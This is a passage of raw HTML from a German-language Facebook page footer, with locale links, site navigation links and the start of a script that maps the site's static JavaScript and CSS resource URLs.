                    <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                        <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
                            <li>Deutsch</li>
                            <li><a class="_sv4" dir="ltr" href="https://www.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;en_US&quot;, &quot;de_DE&quot;, &quot;https:\/\/www.facebook.com\/&quot;, &quot;www_list_selector&quot;, 0); return false;"
                                    title="English (US)">English (US)</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;de_DE&quot;, &quot;https:\/\/tr-tr.facebook.com\/&quot;, &quot;www_list_selector&quot;, 1); return false;"
                                    title="Turkish">Türkçe</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://pl-pl.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pl_PL&quot;, &quot;de_DE&quot;, &quot;https:\/\/pl-pl.facebook.com\/&quot;, &quot;www_list_selector&quot;, 2); return false;"
                                    title="Polish">Polski</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;de_DE&quot;, &quot;https:\/\/it-it.facebook.com\/&quot;, &quot;www_list_selector&quot;, 3); return false;"
                                    title="Italian">Italiano</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://ro-ro.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ro_RO&quot;, &quot;de_DE&quot;, &quot;https:\/\/ro-ro.facebook.com\/&quot;, &quot;www_list_selector&quot;, 4); return false;"
                                    title="Romanian">Română</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;de_DE&quot;, &quot;https:\/\/fr-fr.facebook.com\/&quot;, &quot;www_list_selector&quot;, 5); return false;"
                                    title="French (France)">Français (France)</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://ru-ru.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ru_RU&quot;, &quot;de_DE&quot;, &quot;https:\/\/ru-ru.facebook.com\/&quot;, &quot;www_list_selector&quot;, 6); return false;"
                                    title="Russian">Русский</a></li>
                            <li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;de_DE&quot;, &quot;https:\/\/ar-ar.facebook.com\/&quot;, &quot;www_list_selector&quot;, 7); return false;"
                                    title="Arabic">العربية</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;de_DE&quot;, &quot;https:\/\/es-la.facebook.com\/&quot;, &quot;www_list_selector&quot;, 8); return false;"
                                    title="Spanish">Español</a></li>
                            <li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/"
                                    onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;de_DE&quot;, &quot;https:\/\/pt-br.facebook.com\/&quot;, &quot;www_list_selector&quot;, 9); return false;"
                                    title="Portuguese (Brazil)">Português (Brasil)</a></li>
                            <li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog"
                                    ajaxify="/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2F&amp;source=www_list_selector_more"
                                    href="#" title="Weitere Sprachen anzeigen"><i
                                        class="img sp_Awgqz7K4lHq sx_60b650"></i></a></li>
                        </ul>
                        <div id="contentCurve"></div>
                        <div id="pageFooterChildren" role="contentinfo" aria-label="Facebook-Webseitenlinks">
                            <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                                <li><a href="/reg/" title="F&#xfc;r Facebook registrieren">Registrieren</a></li>
                                <li><a href="/login/" title="Bei Facebook anmelden">Anmelden</a></li>
                                <li><a href="https://messenger.com/" title="Probiere den Messenger aus.">Messenger</a>
                                </li>
                                <li><a href="/lite/" title="Facebook Lite f&#xfc;r Android">Facebook Lite</a></li>
                                <li><a href="https://de-de.facebook.com/watch/"
                                        title="Durchst&#xf6;bere unsere Watch-Videos.">Watch</a></li>
                                <li><a href="/places/" title="Probiere beliebte Orte auf Facebook aus.">Orte</a></li>
                                <li><a href="/games/" title="Probiere Spiele auf Facebook aus.">Spiele</a></li>
                                <li><a href="/marketplace/"
                                        title="Im Facebook Marketplace Artikel kaufen und verkaufen">Marketplace</a>
                                </li>
                                <li><a href="https://pay.facebook.com/" title="Weitere Informationen zu Facebook Pay"
                                        target="_blank">Facebook Pay</a></li>
                                <li><a href="https://www.oculus.com/" title="Weitere Informationen zu Oculus"
                                        target="_blank">Oculus</a></li>
                                <li><a href="https://portal.facebook.com/" title="Mehr zu Portal from Facebook"
                                        target="_blank">Portal</a></li>
                                <li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT09Dud9rlcO53Z3Ub-YajS4O0_9NrbW9FlYwU6naSHQ3XDXm3H9VnbF5WUGFlE7ZlnqIMGKWL2sYBdHnHOAQdmGAAobEw8hvPzee5tzypKt2x9ssh8Kr3k-RRrUfNXPTW-gst6tMTpLZ1-v6H3V4fnlQ6raZLORSWTlsA"
                                        title="Probiere Instagram aus" target="_blank" rel="noopener nofollow"
                                        data-lynx-mode="asynclazy">Instagram</a></li>
                                <li><a href="https://www.bulletin.com/"
                                        title="Hol dir den Bulletin-Newsletter">Bulletin</a></li>
                                <li><a href="/local/lists/245019872666104/"
                                        title="Durchsuche unser Verzeichnis &#x201e;Lokale Listen&#x201c;.">Lokales</a>
                                </li>
                                <li><a href="/fundraisers/"
                                        title="Spende f&#xfc;r eine sinnvolle Sache.">Spendenaktionen</a></li>
                                <li><a href="/biz/directory/"
                                        title="Durchsuche unser Facebook Dienstleistungsverzeichnis">Services</a></li>
                                <li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D"
                                        title="Wahl-Informationszentrum ansehen">Wahl-Informationszentrum</a></li>
                                <li><a href="/groups/explore/" title="Entdecke unsere Gruppen.">Gruppen</a></li>
                                <li><a href="https://about.facebook.com/" accesskey="8"
                                        title="Lies unseren Blog, entdecke unseren Ressourcenbereich und suche nach Jobs.">Info</a>
                                </li>
                                <li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto"
                                        title="Wirb auf Facebook.">Werbeanzeige erstellen</a></li>
                                <li><a href="/pages/create/?ref_type=site_footer" title="Seite erstellen">Seite
                                        erstellen</a></li>
                                <li><a href="https://developers.facebook.com/?ref=pf"
                                        title="Entwickle Apps auf unserer Plattform.">Entwickler</a></li>
                                <li><a href="/careers/?ref=pf"
                                        title="Mach deinen n&#xe4;chsten Karriereschritt und bewirb dich bei unserem gro&#xdf;artigen Unternehmen.">Karriere</a>
                                </li>
                                <li><a data-nocookies="1" href="/privacy/explanation/"
                                        title="Erfahre mehr &#xfc;ber deine Privatsph&#xe4;re und Facebook.">Privatsphäre</a>
                                </li>
                                <li><a href="/policies/cookies/" title="Erfahre mehr &#xfc;ber Cookies und Facebook."
                                        data-nocookies="1">Cookies</a></li>
                                <li><a class="_41ug" data-nocookies="1"
                                        href="https://www.facebook.com/help/568137493302217"
                                        title="Erfahre mehr &#xfc;ber Datenschutzinfo.">Werbepräferenzen<i
                                            class="img sp_Awgqz7K4lHq sx_f315b2"></i></a></li>
                                <li><a data-nocookies="1" href="/legal/terms?ref=pf" accesskey="9"
                                        title="Unsere Nutzungsbedingungen und Richtlinien.">Impressum/Terms/NetzDG/UrhDaG</a>
                                </li>
                                <li><a href="/help/?ref=pf" accesskey="0"
                                        title="Besuche unseren Hilfebereich.">Hilfe</a></li>
                                <li><a href="help/637205020878504"
                                        title="Klicke auf unseren Hinweis zum Hochladen von Kontakten und zu Nicht-Nutzern.">Hochladen
                                        von Kontakten und Nicht-Nutzer</a></li>
                                <li><a accesskey="6" class="accessible_elem" href="/settings"
                                        title="Facebook-Einstellungen ansehen und bearbeiten.">Einstellungen</a></li>
                                <li><a accesskey="7" class="accessible_elem"
                                        href="/allactivity?privacy_source=activity_log_top_menu"
                                        title="Aktivit&#xe4;tenprotokoll anzeigen">Aktivitätenprotokoll</a></li>
                            </ul>
                        </div>
                        <div class="mvl copyright">
                            <div><span> Meta © 2022</span></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0"
                style="display:none" /></span>
    </div>
    <div style="display:none"></div>
    <script>requireLazy(["HasteSupportData"], function (m) { m.handle({ "bxData": { "875231": { "uri": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico" } } }) }); requireLazy(["Bootloader"], function (m) { m.handlePayload({ "consistency": { "rev": 1005858897 }, "rsrcMap": { "d3dwM6j": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/QNiij2myEC3.js?_nc_x=Ij3Wp8lg5Kz" }, "09fTQeX": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yO\/r\/YpuYHpx9qi2.js?_nc_x=Ij3Wp8lg5Kz" }, "QvOtGL6": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/BT8w9HZghpi.js?_nc_x=Ij3Wp8lg5Kz" }, "OlAwqr9": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/U6-FknelVAN.js?_nc_x=Ij3Wp8lg5Kz" }, "Rtwqv9J": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iN_84\/yP\/l\/de_DE\/7sQ4paSA82Q.js?_nc_x=Ij3Wp8lg5Kz" }, "9ln7HcE": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/Gpanav-SH44.js?_nc_x=Ij3Wp8lg5Kz" }, "yiyYHK7": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/NMkLR6my0IC.js?_nc_x=Ij3Wp8lg5Kz" }, "urs4j8c": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iMoJ4\/ys\/l\/de_DE\/soyb2vP7dGC.js?_nc_x=Ij3Wp8lg5Kz" }, "JS+Bt8e": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iwoq4\/yj\/l\/de_DE\/Z25LODBbfnK.js?_nc_x=Ij3Wp8lg5Kz" }, "czsQTSm": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/r\/9r8JqCgJvpo.js?_nc_x=Ij3Wp8lg5Kz" }, "kCH74Pf": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yr\/r\/WsDmdtCAV2M.js?_nc_x=Ij3Wp8lg5Kz" }, "LfFe6kq": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/sczXDyPA0UL.js?_nc_x=Ij3Wp8lg5Kz" }, "IzwLvCp": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/lRKPJMpIlO3.js?_nc_x=Ij3Wp8lg5Kz" }, "et7uqCn": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/dcm6lSKC-4R.js?_nc_x=Ij3Wp8lg5Kz" }, "2\/maQ\/Q": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/mPQTxAVB7AK.js?_nc_x=Ij3Wp8lg5Kz" }, "R1JMNBw": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yw\/r\/UQc13wnoWNb.js?_nc_x=Ij3Wp8lg5Kz" }, "LAFRw7Q": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i5jB4\/yi\/l\/de_DE\/d4QgmPTWs5b.js?_nc_x=Ij3Wp8lg5Kz" }, "9PknbeX": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/10ESdM1D05y.js?_nc_x=Ij3Wp8lg5Kz" }, "CGkH4FY": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz" }, "VbeV7v7": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yp\/l\/0,cross\/gsVdYchtNab.css?_nc_x=Ij3Wp8lg5Kz" }, "R5w1rCJ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz" }, "0cL4lAm": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/l\/0,cross\/4ayDQYcP9mZ.css?_nc_x=Ij3Wp8lg5Kz" }, "nEGssXB": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y6\/r\/7f3htpnDCOe.js?_nc_x=Ij3Wp8lg5Kz" }, "J8bA\/bj": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iVab4\/yp\/l\/de_DE\/pJRnSSObDKV.js?_nc_x=Ij3Wp8lg5Kz" }, "DCbh1Zj": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y-\/r\/FgBdV2DgWXV.js?_nc_x=Ij3Wp8lg5Kz" }, "lCiWnqM": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iQ9_4\/yT\/l\/de_DE\/7SXfmyLRrBz.js?_nc_x=Ij3Wp8lg5Kz" }, "mfFihMk": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iX7i4\/yZ\/l\/de_DE\/fV5nAN5kxVm.js?_nc_x=Ij3Wp8lg5Kz" }, "0YSJIFD": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yR\/l\/0,cross\/8F-nVTf-eeJ.css?_nc_x=Ij3Wp8lg5Kz" }, "sVQdLRz": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iokI4\/yN\/l\/de_DE\/iRVV5pnPN4b.js?_nc_x=Ij3Wp8lg5Kz" }, "GpQFBwL": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/r\/B1QkyGvU3pd.js?_nc_x=Ij3Wp8lg5Kz" }, "1B7QbkZ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/r\/jI2iQayMLww.js?_nc_x=Ij3Wp8lg5Kz" }, "n\/KAfcq": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yS\/r\/Eo_BI_I20ov.js?_nc_x=Ij3Wp8lg5Kz" }, "pPP6JMr": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/l\/0,cross\/I-DhE3m_UIo.css?_nc_x=Ij3Wp8lg5Kz" }, "XBO+MqR": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/N4A60SPjyvP.js?_nc_x=Ij3Wp8lg5Kz" }, "Lc6FhTQ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iaqN4\/yt\/l\/de_DE\/gIOokCdbClk.js?_nc_x=Ij3Wp8lg5Kz" }, "+WLO04n": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/He02E3XQ6Aj.js?_nc_x=Ij3Wp8lg5Kz" }, "aC8A+Rb": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/8h2PslUKFHc.js?_nc_x=Ij3Wp8lg5Kz" }, "OgLHca\/": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/l\/0,cross\/N9xrD4bXRdl.css?_nc_x=Ij3Wp8lg5Kz" }, "xauFUwO": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/l\/0,cross\/0Z_bOzpY9WU.css?_nc_x=Ij3Wp8lg5Kz" }, "l+lGG6+": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i6sG4\/yb\/l\/de_DE\/mzIS9HKyF78.js?_nc_x=Ij3Wp8lg5Kz" }, "XCWygIO": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/fs_MSG5pbgf.js?_nc_x=Ij3Wp8lg5Kz" }, "XSn8mVF": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/l\/0,cross\/1Oxfik2NDE0.css?_nc_x=Ij3Wp8lg5Kz" }, "\/g8g6la": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y1\/l\/0,cross\/HOhUoLciKcH.css?_nc_x=Ij3Wp8lg5Kz" }, "nR3i3uV": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ym\/r\/1bnXY7tF5Bx.js?_nc_x=Ij3Wp8lg5Kz" }, "5KqtzwJ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yq\/r\/oVBj5VhEKHA.js?_nc_x=Ij3Wp8lg5Kz" }, "qfANMJb": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i4HP4\/yg\/l\/de_DE\/rtfhfvvv9Fu.js?_nc_x=Ij3Wp8lg5Kz" }, "CAhXu5x": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y1\/r\/f60yQ-MkL7v.js?_nc_x=Ij3Wp8lg5Kz" }, "72YXxjp": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i8594\/yy\/l\/de_DE\/fB6bHcCDGkk.js?_nc_x=Ij3Wp8lg5Kz" }, "QiH4FyP": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yV\/r\/jF72OUbYp5S.js?_nc_x=Ij3Wp8lg5Kz" }, "zgNLBSa": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iM3Q4\/yc\/l\/de_DE\/f5Y9H4Tfcb2.js?_nc_x=Ij3Wp8lg5Kz" }, "6wI004b": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i9Md4\/yT\/l\/de_DE\/9xCLnOcbR8o.js?_nc_x=Ij3Wp8lg5Kz" }, "BeaYVaG": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yR\/r\/4ZyYRJlkity.js?_nc_x=Ij3Wp8lg5Kz" }, "VtZ600j": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/l\/0,cross\/iYuVC1so9AF.css?_nc_x=Ij3Wp8lg5Kz" }, "kKVtO2\/": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/r\/bXaD7L4iUtv.js?_nc_x=Ij3Wp8lg5Kz" }, "Vy+h9Si": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iD384\/y8\/l\/de_DE\/IGcfMEEw6LV.js?_nc_x=Ij3Wp8lg5Kz" }, "IjyuYS8": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iGB54\/yF\/l\/de_DE\/qzHa-ud1bOZ.js?_nc_x=Ij3Wp8lg5Kz" }, "18dG1sp": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yV\/r\/8gjIqkUnBC6.js?_nc_x=Ij3Wp8lg5Kz" }, "j55NIq3": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/260UgeeNR1p.js?_nc_x=Ij3Wp8lg5Kz" }, "JqiCp\/p": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ipIN4\/y4\/l\/de_DE\/UVOwi756dic.js?_nc_x=Ij3Wp8lg5Kz" }, "\/yFLBaz": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/HAejNTg1mzL.js?_nc_x=Ij3Wp8lg5Kz" }, "tphu\/a3": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i0zm4\/yh\/l\/de_DE\/oV0kSRZviR0.js?_nc_x=Ij3Wp8lg5Kz" }, "wjeRNv7": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iIN64\/yv\/l\/de_DE\/5OHwjyxBPgJ.js?_nc_x=Ij3Wp8lg5Kz" }, "m9AQnsq": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/DoxtFZwfWaT.js?_nc_x=Ij3Wp8lg5Kz" }, "PjirnkC": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iywN4\/yP\/l\/de_DE\/jobCB_D1RFr.js?_nc_x=Ij3Wp8lg5Kz" }, "q3RwTR2": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y5\/r\/zh7xwcxSsjo.js?_nc_x=Ij3Wp8lg5Kz" }, "iYVBBeL": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y-\/l\/0,cross\/JyAQpkmPbVM.css?_nc_x=Ij3Wp8lg5Kz" }, "PogKv1z": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/B_KGsWja-Lk.js?_nc_x=Ij3Wp8lg5Kz" }, "keS2jaQ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i1pM4\/yz\/l\/de_DE\/GmSxeHng_Zs.js?_nc_x=Ij3Wp8lg5Kz" }, "xQbgY52": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iPnn4\/yb\/l\/de_DE\/y901wGw_uyk.js?_nc_x=Ij3Wp8lg5Kz" }, "SrpP6vx": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/bll4-7p4Ipj.js?_nc_x=Ij3Wp8lg5Kz" }, "8Y3b9s3": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iZiY4\/y5\/l\/de_DE\/Q5ZAwkw-ghC.js?_nc_x=Ij3Wp8lg5Kz" }, "X4zJLTj": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yc\/l\/0,cross\/_QoVLGrkLZb.css?_nc_x=Ij3Wp8lg5Kz" }, "sKCQcVV": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yo\/r\/w3RcVcrdLjy.js?_nc_x=Ij3Wp8lg5Kz" }, "jj29UZB": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/r\/w5W7kbBpKe-.js?_nc_x=Ij3Wp8lg5Kz" }, "Tw2WFuc": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/l\/0,cross\/HSYTTeW-Yvy.css?_nc_x=Ij3Wp8lg5Kz" }, "0yvdXu1": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/l\/0,cross\/IGzQ9ShxP1S.css?_nc_x=Ij3Wp8lg5Kz" }, "J+vI9it": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/woSjpSLmG4O.js?_nc_x=Ij3Wp8lg5Kz" }, "TTZiqd+": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yS\/l\/0,cross\/Qgt7iJfKlAE.css?_nc_x=Ij3Wp8lg5Kz" }, "RLNnP+9": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y6\/r\/nPC6rn9_Jjy.js?_nc_x=Ij3Wp8lg5Kz" }, "fv8F\/Uq": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iy7f4\/yU\/l\/de_DE\/i2rV2Z2ue3c.js?_nc_x=Ij3Wp8lg5Kz" }, "NsK\/jQf": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iWmJ4\/y3\/l\/de_DE\/T6T_IbPwn-9.js?_nc_x=Ij3Wp8lg5Kz" }, "2Nv60\/8": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yw\/l\/0,cross\/AQDlQWSkMpI.css?_nc_x=Ij3Wp8lg5Kz" }, "EFJEIrp": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/2_gcQgtwozT.js?_nc_x=Ij3Wp8lg5Kz" }, "qtDewXO": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i9l44\/y2\/l\/de_DE\/XSYwkqEvlD5.js?_nc_x=Ij3Wp8lg5Kz" }, "mXhzX4c": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iI8I4\/ym\/l\/de_DE\/DMIoNCChmy1.js?_nc_x=Ij3Wp8lg5Kz" }, "lyWNTvt": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/l\/0,cross\/pyVweoYjqYH.css?_nc_x=Ij3Wp8lg5Kz" }, "7d44ATB": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/l\/0,cross\/lJ-vnE5aLsl.css?_nc_x=Ij3Wp8lg5Kz" }, "8VVv4d4": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iijU4\/yo\/l\/de_DE\/Hy9I6l5S9kp.js?_nc_x=Ij3Wp8lg5Kz" }, "\/jN3FRx": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iVUS4\/yp\/l\/de_DE\/2ktKKi7nLO4.js?_nc_x=Ij3Wp8lg5Kz" }, "gf4oXSY": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/l\/0,cross\/XnE-xAErFL9.css?_nc_x=Ij3Wp8lg5Kz" }, "bZsN8xz": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y6\/l\/0,cross\/bYvrw4WEfKJ.css?_nc_x=Ij3Wp8lg5Kz" }, "DW6Lwm3": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ixuL4\/yB\/l\/de_DE\/Th74FnWM_ao.js?_nc_x=Ij3Wp8lg5Kz" }, "xtlhRyF": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/l\/0,cross\/Hzhi76c0B_w.css?_nc_x=Ij3Wp8lg5Kz" }, "cwdzCLH": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iUnp4\/y2\/l\/de_DE\/0wJz8Rd1esQ.js?_nc_x=Ij3Wp8lg5Kz" }, "6q2lMYg": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yT\/r\/4UxLB8N-EGu.js?_nc_x=Ij3Wp8lg5Kz" }, "LP\/Y1SY": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yQ\/r\/CH-tZLBHW9K.js?_nc_x=Ij3Wp8lg5Kz" }, "jHxpDAJ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iaWh4\/yV\/l\/de_DE\/XifABmLkH97.js?_nc_x=Ij3Wp8lg5Kz" }, "ThOBR\/w": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3izPY4\/yK\/l\/de_DE\/CMZhH88Z2Ww.js?_nc_x=Ij3Wp8lg5Kz" }, "4xpjkHx": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yB\/l\/0,cross\/mDIrmOS1tFD.css?_nc_x=Ij3Wp8lg5Kz" }, "6T7hURa": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3isAG4\/yQ\/l\/de_DE\/Y0wAD5vK8Qu.js?_nc_x=Ij3Wp8lg5Kz" }, "hM2DEGN": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/l\/0,cross\/YitZjSBfp2S.css?_nc_x=Ij3Wp8lg5Kz" }, "2rr9kN+": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iXxw4\/y5\/l\/de_DE\/VoldCIS_HQa.js?_nc_x=Ij3Wp8lg5Kz" }, "8zjjTD4": { "type": "css", "src": 